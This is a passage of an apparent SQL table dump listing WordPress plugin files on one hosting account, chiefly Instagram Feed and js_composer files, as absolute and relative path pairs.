lugins/instagram-feed/inc/Services/ServiceContainer.php'),(939,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Services/ShortcodeService.php','wp-content/plugins/instagram-feed/inc/Services/ShortcodeService.php'),(940,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/admin/PluginSilentUpgrader.php','wp-content/plugins/instagram-feed/inc/admin/PluginSilentUpgrader.php'),(941,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/admin/PluginSilentUpgraderSkin.php','wp-content/plugins/instagram-feed/inc/admin/PluginSilentUpgraderSkin.php'),(942,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/admin/SBI_Onboarding_wizard.php','wp-content/plugins/instagram-feed/inc/admin/SBI_Onboarding_wizard.php'),(943,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/admin/actions.php','wp-content/plugins/instagram-feed/inc/admin/actions.php'),(944,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/admin/addon-functions.php','wp-content/plugins/instagram-feed/inc/admin/addon-functions.php'),(945,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/admin/blocks/class-sbi-blocks.php','wp-content/plugins/instagram-feed/inc/admin/blocks/class-sbi-blocks.php'),(946,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/admin/class-install-skin.php','wp-content/plugins/instagram-feed/inc/admin/class-install-skin.php'),(947,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/admin/class-sbi-account-connector.php','wp-content/plugins/instagram-feed/inc/admin/class-sbi-account-connector.php'),(948,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/admin/class-sbi-new-user.php','wp-content/plugins/instagram-feed/inc/admin/class-sbi-new-user.php'),(949,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/admin/class-sbi-notifications.php','wp-content/plugins/instagram-feed/inc/admin/class-sbi-notifications.php'),(950,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/admin/class-sbi-sitehealth.php','wp-content/plugins/instagram-feed/inc/admin/class-sbi-sitehealth.php'),(951,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/class-sb-instagram-api-connect.php','wp-content/plugins/instagram-feed/inc/class-sb-instagram-api-connect.php'),(952,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/class-sb-instagram-cache.php','wp-content/plugins/instagram-feed/inc/class-sb-instagram-cache.php'),(953,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/class-sb-instagram-connected-account.php','wp-content/plugins/instagram-feed/inc/class-sb-instagram-connected-account.php'),(954,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/class-sb-instagram-cron-updater.php','wp-content/plugins/instagram-feed/inc/class-sb-instagram-cron-updater.php'),(955,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/class-sb-instagram-data-encryption.php','wp-content/plugins/instagram-feed/inc/class-sb-instagram-data-encryption.php'),(956,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/class-sb-instagram-data-manager.php','wp-content/plugins/instagram-feed/inc/class-sb-instagram-data-manager.php'),(957,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/class-sb-instagram-display-elements.php','wp-content/plugins/instagram-feed/inc/class-sb-instagram-display-elements.php'),(958,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/class-sb-instagram-education.php','wp-content/plugins/instagram-feed/inc/class-sb-instagram-education.php'),(959,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/class-sb-instagram-feed-locator.php','wp-content/plugins/instagram-feed/inc/class-sb-instagram-feed-locator.php'),(960,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/class-sb-instagram-feed.php','wp-content/plugins/instagram-feed/inc/class-sb-instagram-feed.php'),(961,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/class-sb-instagram-gdpr-integrations.php','wp-content/plugins/instagram-feed/inc/class-sb-instagram-gdpr-integrations.php'),(962,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/class-sb-instagram-oembed.php','wp-content/plugins/instagram-feed/inc/class-sb-instagram-oembed.php'),(963,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/class-sb-instagram-parse.php','wp-content/plugins/instagram-feed/inc/class-sb-instagram-parse.php'),(964,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/class-sb-instagram-post-set.php','wp-content/plugins/instagram-feed/inc/class-sb-instagram-post-set.php'),(965,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/class-sb-instagram-post.php','wp-content/plugins/instagram-feed/inc/class-sb-instagram-post.php'),(966,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/class-sb-instagram-posts-manager.php','wp-content/plugins/instagram-feed/inc/class-sb-instagram-posts-manager.php'),(967,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/class-sb-instagram-settings.php','wp-content/plugins/instagram-feed/inc/class-sb-instagram-settings.php'),(968,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/class-sb-instagram-single.php','wp-content/plugins/instagram-feed/inc/class-sb-instagram-single.php'),(969,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/class-sb-instagram-token-refresher.php','wp-content/plugins/instagram-feed/inc/class-sb-instagram-token-refresher.php'),(970,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/email.php','wp-content/plugins/instagram-feed/inc/email.php'),(971,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/if-functions.php','wp-content/plugins/instagram-feed/inc/if-functions.php'),(972,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/instagram-feed.php','wp-content/plugins/instagram-feed/instagram-feed.php'),(973,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/js/admin-notifications.js','wp-content/plugins/instagram-feed/js/admin-notifications.js'),(974,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/js/jquery.matchHeight-min.js','wp-content/plugins/instagram-feed/js/jquery.matchHeight-min.js'),(975,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/js/sb-blocks.js','wp-content/plugins/instagram-feed/js/sb-blocks.js'),(976,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/js/sb-instagram-2-2.js','wp-content/plugins/instagram-feed/js/sb-instagram-2-2.js'),(977,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/js/sb-instagram-2-2.min.js','wp-content/plugins/instagram-feed/js/sb-instagram-2-2.min.js'),(978,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/js/sb-instagram-admin-6.js','wp-content/plugins/instagram-feed/js/sb-instagram-admin-6.js'),(979,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/js/sbi-scripts.js','wp-content/plugins/instagram-feed/js/sbi-scripts.js'),(980,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/js/sbi-scripts.min.js','wp-content/plugins/instagram-feed/js/sbi-scripts.min.js'),(981,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/js/vue.min.js','wp-content/plugins/instagram-feed/js/vue.min.js'),(982,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/languages/instagram-feed-de_DE.mo','wp-content/plugins/instagram-feed/languages/instagram-feed-de_DE.mo'),(983,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/languages/instagram-feed-es_ES.mo','wp-content/plugins/instagram-feed/languages/instagram-feed-es_ES.mo'),(984,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/languages/instagram-feed-fr_FR.mo','wp-content/plugins/instagram-feed/languages/instagram-feed-fr_FR.mo'),(985,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/languages/instagram-feed-it_IT.mo','wp-content/plugins/instagram-feed/languages/instagram-feed-it_IT.mo'),(986,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/languages/instagram-feed-ja_JA.mo','wp-content/plugins/instagram-feed/languages/instagram-feed-ja_JA.mo'),(987,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/languages/instagram-feed-nl_NL.mo','wp-content/plugins/instagram-feed/languages/instagram-feed-nl_NL.mo'),(988,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/languages/instagram-feed-pl_PL.mo','wp-content/plugins/instagram-feed/languages/instagram-feed-pl_PL.mo'),(989,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/languages/instagram-feed-pt_BR.mo','wp-content/plugins/instagram-feed/languages/instagram-feed-pt_BR.mo'),(990,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/languages/instagram-feed-ru_RU.mo','wp-content/plugins/instagram-feed/languages/instagram-feed-ru_RU.mo'),(991,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/languages/instagram-feed-tr_TR.mo','wp-content/plugins/instagram-feed/languages/instagram-feed-tr_TR.mo'),(992,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/languages/instagram-feed.pot','wp-content/plugins/instagram-feed/languages/instagram-feed.pot'),(993,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/templates/feed.php','wp-content/plugins/instagram-feed/templates/feed.php'),(994,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/templates/footer.php','wp-content/plugins/instagram-feed/templates/footer.php'),(995,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/templates/header.php','wp-content/plugins/instagram-feed/templates/header.php'),(996,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/templates/item.php','wp-content/plugins/instagram-feed/templates/item.php'),(997,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/autoload.php','wp-content/plugins/instagram-feed/vendor/autoload.php'),(998,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/composer/ClassLoader.php','wp-content/plugins/instagram-feed/vendor/composer/ClassLoader.php'),(999,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/composer/InstalledVersions.php','wp-content/plugins/instagram-feed/vendor/composer/InstalledVersions.php'),(1000,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/composer/LICENSE','wp-content/plugins/instagram-feed/vendor/composer/LICENSE'),(1001,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/composer/autoload_classmap.php','wp-content/plugins/instagram-feed/vendor/composer/autoload_classmap.php'),(1002,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/composer/autoload_namespaces.php','wp-content/plugins/instagram-feed/vendor/composer/autoload_namespaces.php'),(1003,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/composer/autoload_psr4.php','wp-content/plugins/instagram-feed/vendor/composer/autoload_psr4.php'),(1004,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/composer/autoload_real.php','wp-content/plugins/instagram-feed/vendor/composer/autoload_real.php'),(1005,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/composer/autoload_static.php','wp-content/plugins/instagram-feed/vendor/composer/autoload_static.php'),(1006,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/composer/installed.json','wp-content/plugins/instagram-feed/vendor/composer/installed.json'),(1007,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/composer/installed.php','wp-content/plugins/instagram-feed/vendor/composer/installed.php'),(1008,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/smashballoon/stubs/composer.json','wp-content/plugins/instagram-feed/vendor/smashballoon/stubs/composer.json'),(1009,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/smashballoon/stubs/src/Services/ServiceProvider.php','wp-content/plugins/instagram-feed/vendor/smashballoon/stubs/src/Services/ServiceProvider.php'),(1010,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/smashballoon/stubs/src/Services/ServiceProviderInterface.php','wp-content/plugins/instagram-feed/vendor/smashballoon/stubs/src/Services/ServiceProviderInterface.php'),(1011,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/smashballoon/stubs/src/Traits/Singleton.php','wp-content/plugins/instagram-feed/vendor/smashballoon/stubs/src/Traits/Singleton.php'),(1012,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/widget.php','wp-content/plugins/instagram-feed/widget.php'),(1013,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/wpml-config.xml','wp-content/plugins/instagram-feed/wpml-config.xml'),(1014,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/css/lib/monosocialiconsfont/fonts/MonoSocialIconsFont.svg','wp-content/plugins/js_composer/assets/css/lib/monosocialiconsfont/fonts/MonoSocialIconsFont.svg'),(1015,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/css/lib/typicons/src/font/typicons.svg','wp-content/plugins/js_composer/assets/css/lib/typicons/src/font/typicons.svg'),(1016,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/css/lib/vc-entypo/fonts/vc_entypo.svg','wp-content/plugins/js_composer/assets/css/lib/vc-entypo/fonts/vc_entypo.svg'),(1017,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/css/lib/vc-linecons/fonts/vc_linecons.svg','wp-content/plugins/js_composer/assets/css/lib/vc-linecons/fonts/vc_linecons.svg'),(1018,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/css/lib/vc-material/fonts/vc_material.svg','wp-content/plugins/js_composer/assets/css/lib/vc-material/fonts/vc_material.svg'),(1019,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/css/lib/vc-open-iconic/fonts/vc_openiconic.svg','wp-content/plugins/js_composer/assets/css/lib/vc-open-iconic/fonts/vc_openiconic.svg'),(1020,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/fonts/vc_grid/vc_grid_v1.svg','wp-content/plugins/js_composer/assets/fonts/vc_grid/vc_grid_v1.svg'),(1021,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/fonts/vc_icons/fonts/VC-Icons.svg','wp-content/plugins/js_composer/assets/fonts/vc_icons/fonts/VC-Icons.svg'),(1022,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/fonts/vc_icons_v2/fonts/vcpb-plugin-icons.svg','wp-content/plugins/js_composer/assets/fonts/vc_icons_v2/fonts/vcpb-plugin-icons.svg'),(1023,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/dist/backend-actions.min.js','wp-content/plugins/js_composer/assets/js/dist/backend-actions.min.js'),(1024,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/dist/backend.min.js','wp-content/plugins/js_composer/assets/js/dist/backend.min.js'),(1025,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/dist/edit-form.min.js','wp-content/plugins/js_composer/assets/js/dist/edit-form.min.js'),(1026,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/dist/frontend-editor.min.js','wp-content/plugins/js_composer/assets/js/dist/frontend-editor.min.js'),(1027,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/dist/grid-builder.min.js','wp-content/plugins/js_composer/assets/js/dist/grid-builder.min.js'),(1028,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js','wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js'),(1029,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/dist/page_editable.min.js','wp-content/plugins/js_composer/assets/js/dist/page_editable.min.js'),(1030,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/dist/settings.min.js','wp-content/plugins/js_composer/assets/js/dist/settings.min.js'),(1031,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/dist/vc_grid.min.js','wp-content/plugins/js_composer/assets/js/dist/vc_grid.min.js'),(1032,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/editors/templates-preview.js','wp-content/plugins/js_composer/assets/js/editors/templates-preview.js'),(1033,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/charts/vc_line_chart.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/charts/vc_line_chart.js'),(1034,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/charts/vc_pie.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/charts/vc_pie.js'),(1035,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/charts/vc_round_chart.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/charts/vc_round_chart.js'),(1036,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/container.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/container.js'),(1037,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/container_with_parent.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/container_with_parent.js'),(1038,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/vc_column.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/vc_column.js'),(1039,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/vc_column_inner.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/vc_column_inner.js'),(1040,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/vc_row.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/vc_row.js'),(1041,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/vc_row_inner.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/vc_row_inner.js'),(1042,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/vc_section.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/vc_section.js'),(1043,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_column_text.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_column_text.js'),(1044,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_flickr.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_flickr.js'),(1045,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_posts_slider.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_posts_slider.js'),(1046,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_raw_js.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_raw_js.js'),(1047,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_toggle.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_toggle.js'),(1048,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_accordion.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_accordion.js'),(1049,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_accordion_tab.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_accordion_tab.js'),(1050,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_tab.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_tab.js'),(1051,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_tabs.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_tabs.js'),(1052,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_tour.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_tour.js'),(1053,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/vc_carousel.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/vc_carousel.js'),(1054,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_basic_grid.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_basic_grid.js'),(1055,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_masonry_grid.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_masonry_grid.js'),(1056,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_masonry_media_grid.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_masonry_media_grid.js'),(1057,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_media_grid.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_media_grid.js'),(1058,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/images/vc_gallery.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/images/vc_gallery.js'),(1059,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/images/vc_images_carousel.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/images/vc_images_carousel.js'),(1060,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/images/vc_single_image.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/images/vc_single_image.js'),(1061,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/tta_events.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/tta_events.js'),(1062,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_accordion.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_accordion.js'),(1063,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_pageable.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_pageable.js'),(1064,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_section.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_section.js'),(1065,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_tabs.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_tabs.js'),(1066,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_tour.js','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_tour.js'),(1067,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/vendors/plugins/jwplayer.js','wp-content/plugins/js_composer/assets/js/frontend_editor/vendors/plugins/jwplayer.js'),(1068,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/vendors/advanced_custom_fields.js','wp-content/plugins/js_composer/assets/js/vendors/advanced_custom_fields.js'),(1069,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/vendors/qtranslate_backend.js','wp-content/plugins/js_composer/assets/js/vendors/qtranslate_backend.js'),(1070,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/vendors/qtranslate_frontend.js','wp-content/plugins/js_composer/assets/js/vendors/qtranslate_frontend.js'),(1071,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/vendors/qtranslatex_backend.js','wp-content/plugins/js_composer/assets/js/vendors/qtranslatex_backend.js'),(1072,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/vendors/qtranslatex_frontend.js','wp-content/plugins/js_composer/assets/js/vendors/qtranslatex_frontend.js'),(1073,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/vendors/woocommerce-add-to-cart.js','wp-content/plugins/js_composer/assets/js/vendors/woocommerce-add-to-cart.js'),(1074,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/vendors/woocommerce.js','wp-content/plugins/js_composer/assets/js/vendors/woocommerce.js'),(1075,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/vendors/yoast.js','wp-content/plugins/js_composer/assets/js/vendors/yoast.js'),(1076,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/ace-builds/src-min-noconflict/ace.js','wp-content/plugins/js_composer/assets/lib/bower/ace-builds/src-min-noconflict/ace.js'),(1077,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/ace-builds/src-min-noconflict/mode-css.js','wp-content/plugins/js_composer/assets/lib/bower/ace-builds/src-min-noconflict/mode-css.js'),(1078,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/ace-builds/src-min-noconflict/theme-chrome.js','wp-content/plugins/js_composer/assets/lib/bower/ace-builds/src-min-noconflict/theme-chrome.js'),(1079,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/ace-builds/src-min-noconflict/worker-css.js','wp-content/plugins/js_composer/assets/lib/bower/ace-builds/src-min-noconflict/worker-css.js'),(1080,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/dist/js/bootstrap.min.js','wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/dist/js/bootstrap.min.js'),(1081,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/affix.min.js','wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/affix.min.js'),(1082,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/alert.min.js','wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/alert.min.js'),(1083,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/button.min.js','wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/button.min.js'),(1084,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/carousel.min.js','wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/carousel.min.js'),(1085,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/collapse.min.js','wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/collapse.min.js'),(1086,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/dropdown.min.js','wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/dropdown.min.js'),(1087,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/modal.min.js','wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/modal.min.js'),(1088,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/popover.min.js','wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/popover.min.js'),(1089,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/scrollspy.min.js','wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/scrollspy.min.js'),(1090,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/tab.min.js','wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/tab.min.js'),(1091,'/home/tummmyov/tummyrevolution.com/w